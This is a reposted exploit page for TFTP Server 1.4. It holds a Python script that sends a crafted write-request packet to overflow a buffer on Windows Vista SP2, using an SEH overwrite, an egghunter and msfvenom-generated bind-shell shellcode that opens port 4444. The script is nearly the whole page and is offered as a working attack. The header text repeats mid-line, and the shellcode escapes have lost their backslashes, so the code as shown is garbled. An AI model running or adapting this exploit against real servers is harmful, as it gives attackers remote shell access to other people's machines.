TFTP Server 1.4 WRQ Buffer Overflow

Written by khalil on . Posted in Vulnerabilities

# Exploit Title: [TFTP Server 1.4 - WRQ Buffer Overflow Exploit [Egghunter]]
# Exploit Author: [Karn Ganeshen]
# Vendor Homepage: [http://sourceforge.net/projects # Exploit Title: [TFTP Server 1.4 - WRQ Buffer Overflow Exploit [Egghunter]]
# Exploit Author: [Karn Ganeshen]
# Vendor Homepage: [http://sourceforge.net/projects/tftp-server/]
# Version: [1.4]
# Tested on: [Windows Vista SP2]
#
# Coded this for Vista Ultimate, Service Pack 2
# 3-byte overwrite + short jump + Egghunter
# Standalone mode
#
# Couple of overflow exploits already here for this tftp, none for Vista SP2 + Egghunter:
# http://www.exploit-db.com/exploits/5314/
# http://www.exploit-db.com/exploits/10542/
# http://www.exploit-db.com/exploits/5563/
# https://www.exploit-db.com/exploits/18345/
#

#!/usr/bin/python

import socket
import sys

host = '192.168.49.187'
port = 69

try:
s=socket.socket(socket.AF_INET,socket.SOCK_DGRAM)
except:
print "socket() failed"
sys.exit(1)

# msfvenom -p windows/shell_bind_tcp LHOST=192.168.49.187 -b x00 EXITFUNC=seh -f c -e x86/alpha_mixed
# Payload size: 718 bytes

shellcode = (
"x89xe5xd9xcfxd9x75xf4x5dx55x59x49x49x49x49x49"
"x49x49x49x49x49x43x43x43x43x43x43x37x51x5ax6a"
"x41x58x50x30x41x30x41x6bx41x41x51x32x41x42x32"
"x42x42x30x42x42x41x42x58x50x38x41x42x75x4ax49"
"x59x6cx48x68x4fx72x75x50x63x30x33x30x33x50x6f"
"x79x59x75x35x61x6fx30x51x74x6cx4bx42x70x46x50"
"x6ex6bx62x72x66x6cx6cx4bx73x62x56x74x6cx4bx43"
"x42x45x78x66x6fx58x37x73x7ax56x46x54x71x4bx4f"
"x6ex4cx45x6cx50x61x51x6cx33x32x74x6cx61x30x4b"
"x71x68x4fx74x4dx63x31x39x57x58x62x68x72x76x32"
"x71x47x4ex6bx52x72x64x50x4cx4bx30x4ax45x6cx6c"
"x4bx30x4cx36x71x50x78x68x63x70x48x76x61x6bx61"
"x43x61x4ex6bx61x49x45x70x63x31x48x53x4cx4bx72"
"x69x35x48x38x63x77x4ax77x39x6cx4bx65x64x4cx4b"
"x67x71x58x56x75x61x4bx4fx6cx6cx69x51x7ax6fx76"
"x6dx65x51x39x57x45x68x4dx30x34x35x6ax56x45x53"
"x53x4dx5ax58x47x4bx53x4dx77x54x43x45x4dx34x73"
"x68x6cx4bx61x48x57x54x46x61x6bx63x61x76x6cx4b"
"x74x4cx42x6bx4cx4bx30x58x57x6cx75x51x79x43x4c"
"x4bx33x34x6ex6bx46x61x4ex30x4bx39x73x74x56x44"
"x65x74x63x6bx43x6bx63x51x52x79x53x6ax66x31x59"
"x6fx6bx50x33x6fx33x6fx32x7ax6ex6bx35x42x78x6b"
"x4ex6dx43x6dx62x48x37x43x46x52x37x70x35x50x61"
"x78x72x57x64x33x45x62x71x4fx56x34x53x58x32x6c"
"x63x47x34x66x46x67x4bx4fx6ax75x4ex58x4ex70x43"
"x31x75x50x35x50x31x39x6fx34x72x74x70x50x55x38"
"x56x49x4fx70x30x6bx47x70x69x6fx48x55x71x7ax36"
"x68x51x49x70x50x4ax42x4bx4dx61x50x76x30x33x70"
"x36x30x35x38x69x7ax64x4fx59x4fx6bx50x39x6fx4b"
"x65x7ax37x73x58x43x32x63x30x56x71x71x4cx6cx49"
"x69x76x71x7ax64x50x53x66x72x77x73x58x4ax62x79"
"x4bx50x37x65x37x39x6fx6bx65x36x37x42x48x48x37"
"x4bx59x47x48x6bx4fx39x6fx4bx65x51x47x51x78x50"
"x74x5ax4cx65x6bx79x71x69x6fx6ax75x51x47x4fx67"
"x53x58x61x65x32x4ex32x6dx70x61x49x6fx69x45x61"
"x78x72x43x32x4dx30x64x43x30x4bx39x4ax43x70x57"
"x53x67x72x77x64x71x48x76x31x7ax52x32x42x79x52"
"x76x38x62x69x6dx65x36x4bx77x37x34x61x34x47x4c"
"x57x71x45x51x6cx4dx77x34x44x64x72x30x78x46x53"
"x30x67x34x33x64x32x70x70x56x73x66x42x76x62x66"
"x46x36x30x4ex63x66x46x36x42x73x62x76x52x48x71"
"x69x38x4cx35x6fx6ex66x79x6fx49x45x4cx49x4bx50"
"x52x6ex43x66x30x46x59x6fx54x70x62x48x34x48x6c"
"x47x35x4dx55x30x39x6fx38x55x4fx4bx59x6ex34x4e"
"x76x52x59x7ax73x58x6dx76x6cx55x4dx6dx4dx4dx4b"
"x4fx6ex35x47x4cx63x36x71x6cx45x5ax4fx70x49x6b"
"x59x70x74x35x76x65x4dx6bx50x47x32x33x32x52x30"
"x6fx62x4ax45x50x66x33x69x6fx4ex35x41x41")

# PPR - 0x0040CC22 - in TFTPServerSP.exe
# 3-byte overwrite

jump_one = "xEBxDBx90x90" # negative jump back
egghunter = ("x66x81xcaxffx0fx42x52x6a" #WOOT
"x02x58xcdx2ex3cx05x5ax74"
"xefxb8x54x30x30x57x8bxfa"
"xafx75xeaxafx75xe7xffxe7")

filename = "x90"*734 + "T00WT00W" + shellcode + "x90"*10 + egghunter + "x90"*10 + jump_one + "x22xCCx40"

mode = "netascii"

evil = "x00x02" + filename + "x00" + mode + "x00"

print "[*] Sending evil packet, ph33r"
s.sendto(evil, (host, port))
print "[*] Check port 4444 for bindshell"

Print